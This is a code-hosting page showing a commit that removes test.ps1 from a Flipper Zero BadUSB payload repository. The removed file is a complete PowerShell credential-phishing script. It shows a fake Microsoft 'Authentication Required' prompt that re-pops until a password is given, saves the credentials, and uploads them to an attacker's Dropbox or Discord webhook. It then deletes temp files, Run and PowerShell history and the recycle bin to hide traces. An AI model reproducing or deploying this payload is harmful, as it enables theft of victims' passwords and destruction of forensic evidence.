crash.software
Projects
Pull Requests
Issues
Builds
Jakoby_FlipperZero-BadUSB
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY Jakoby_FlipperZero-BadUSB Commits d4d7f592
🤬
  • ■ ■ ■ ■ ■ ■
    Payloads/Flip-Credz-Plz/test.ps1
    1  -############################################################################################################################################################
    2  -# | ___ _ _ _ # ,d88b.d88b #
    3  -# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
    4  -# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
    5  -# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
    6  -# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
    7  -# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
    8  -# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
    9  -# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
    10  -# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
    11  -# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
    12  -#__________________________________|_________________________________________________________________________# | | ) ~ ( #
    13  -# tiktok.com/@i_am_jakoby # / \ / ~ \ #
    14  -# github.com/I-Am-Jakoby # \ / \~ ~/ #
    15  -# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
    16  -# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
    17  -# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
    18  -############################################################################################################################################################
    19  - 
    20  -<#
    21  -.SYNOPSIS
    22  - This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
    23  -.DESCRIPTION
    24  - A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
    25  - This will be followed by a fake authentication ui prompt.
    26  - If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
    27  - Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection
    28  -.Link
    29  - https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads
    30  -#>
    31  - 
    32  -#------------------------------------------------------------------------------------------------------------------------------------
    33  -# This is for if you want to host your own version of the script
    34  - 
    35  -# $db = "YOUR-DROPBOX-ACCESS-TOKEN"
    36  - 
    37  -# $dc = "YOUR-DISCORD-WEBHOOK"
    38  - 
    39  -#------------------------------------------------------------------------------------------------------------------------------------
    40  - 
    41  -$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
    42  -
    43  -#------------------------------------------------------------------------------------------------------------------------------------
    44  - 
    45  -<#
    46  -.NOTES
    47  - This is to generate the ui.prompt you will use to harvest their credentials
    48  -#>
    49  - 
    50  -function Get-Creds {
    51  - 
    52  -$form = $null
    53  - 
    54  -while ($form -eq $null)
    55  -{
    56  - $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName);
    57  - $cred.getnetworkcredential().password
    58  - 
    59  - if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password))
    60  - {
    61  - [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
    62  - $form = $null
    63  - }
    64  -
    65  - else{
    66  - $creds = $cred.GetNetworkCredential() | fl
    67  - return $creds
    68  - }
    69  -}
    70  -}
    71  - 
    72  -#----------------------------------------------------------------------------------------------------
    73  - 
    74  -<#
    75  -.NOTES
    76  - This is to pause the script until a mouse movement is detected
    77  -#>
    78  - 
    79  -function Pause-Script{
    80  -Add-Type -AssemblyName System.Windows.Forms
    81  -$originalPOS = [System.Windows.Forms.Cursor]::Position.X
    82  -$o=New-Object -ComObject WScript.Shell
    83  - 
    84  - while (1) {
    85  - $pauseTime = 3
    86  - if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
    87  - break
    88  - }
    89  - else {
    90  - $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
    91  - }
    92  - }
    93  -}
    94  - 
    95  -#----------------------------------------------------------------------------------------------------
    96  - 
    97  -# This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
    98  - 
    99  -function Caps-Off {
    100  -Add-Type -AssemblyName System.Windows.Forms
    101  -$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
    102  - 
    103  -#If true, toggle CapsLock key, to ensure that the script doesn't fail
    104  -if ($caps -eq $true){
    105  - 
    106  -$key = New-Object -ComObject WScript.Shell
    107  -$key.SendKeys('{CapsLock}')
    108  -}
    109  -}
    110  -#----------------------------------------------------------------------------------------------------
    111  - 
    112  -<#
    113  -.NOTES
    114  - This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
    115  -#>
    116  - 
    117  -Pause-Script
    118  - 
    119  -Caps-Off
    120  - 
    121  -Add-Type -AssemblyName PresentationCore,PresentationFramework
    122  -$msgBody = "Please authenticate your Microsoft Account."
    123  -$msgTitle = "Authentication Required"
    124  -$msgButton = 'Ok'
    125  -$msgImage = 'Warning'
    126  -$Result = [System.Windows.MessageBox]::Show($msgBody,$msgTitle,$msgButton,$msgImage)
    127  -Write-Host "The user clicked: $Result"
    128  - 
    129  -$creds = Get-Creds
    130  - 
    131  -#------------------------------------------------------------------------------------------------------------------------------------
    132  - 
    133  -<#
    134  -.NOTES
    135  - This is to save the gathered credentials to a file in the temp directory
    136  -#>
    137  - 
    138  -echo $creds >> $env:TMP\$FileName
    139  - 
    140  -#------------------------------------------------------------------------------------------------------------------------------------
    141  - 
    142  -<#
    143  -.NOTES
    144  - This is to upload your files to dropbox
    145  -#>
    146  - 
    147  -function DropBox-Upload {
    148  - 
    149  -[CmdletBinding()]
    150  -param (
    151  -
    152  -[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
    153  -[Alias("f")]
    154  -[string]$SourceFilePath
    155  -)
    156  -$outputFile = Split-Path $SourceFilePath -leaf
    157  -$TargetFilePath="/$outputFile"
    158  -$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
    159  -$authorization = "Bearer " + $db
    160  -$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
    161  -$headers.Add("Authorization", $authorization)
    162  -$headers.Add("Dropbox-API-Arg", $arg)
    163  -$headers.Add("Content-Type", 'application/octet-stream')
    164  -Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
    165  -}
    166  - 
    167  -if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName}
    168  - 
    169  -#------------------------------------------------------------------------------------------------------------------------------------
    170  - 
    171  -function Upload-Discord {
    172  - 
    173  -[CmdletBinding()]
    174  -param (
    175  - [parameter(Position=0,Mandatory=$False)]
    176  - [string]$file,
    177  - [parameter(Position=1,Mandatory=$False)]
    178  - [string]$text
    179  -)
    180  - 
    181  -$hookurl = "$dc"
    182  - 
    183  -$Body = @{
    184  - 'username' = $env:username
    185  - 'content' = $text
    186  -}
    187  - 
    188  -if (-not ([string]::IsNullOrEmpty($text))){
    189  -Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
    190  - 
    191  -if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
    192  -}
    193  - 
    194  -if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName}
    195  - 
    196  -#------------------------------------------------------------------------------------------------------------------------------------
    197  - 
    198  -<#
    199  -.NOTES
    200  - This is to clean up behind you and remove any evidence to prove you were there
    201  -#>
    202  - 
    203  -# Delete contents of Temp folder
    204  - 
    205  -rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
    206  - 
    207  -# Delete run box history
    208  - 
    209  -reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
    210  - 
    211  -# Delete powershell history
    212  - 
    213  -Remove-Item (Get-PSreadlineOption).HistorySavePath
    214  - 
    215  -# Deletes contents of recycle bin
    216  - 
    217  -Clear-RecycleBin -Force -ErrorAction SilentlyContinue
    218  - 
    219  -exit
    220  - 
Please wait...
Page is in error, reload to recover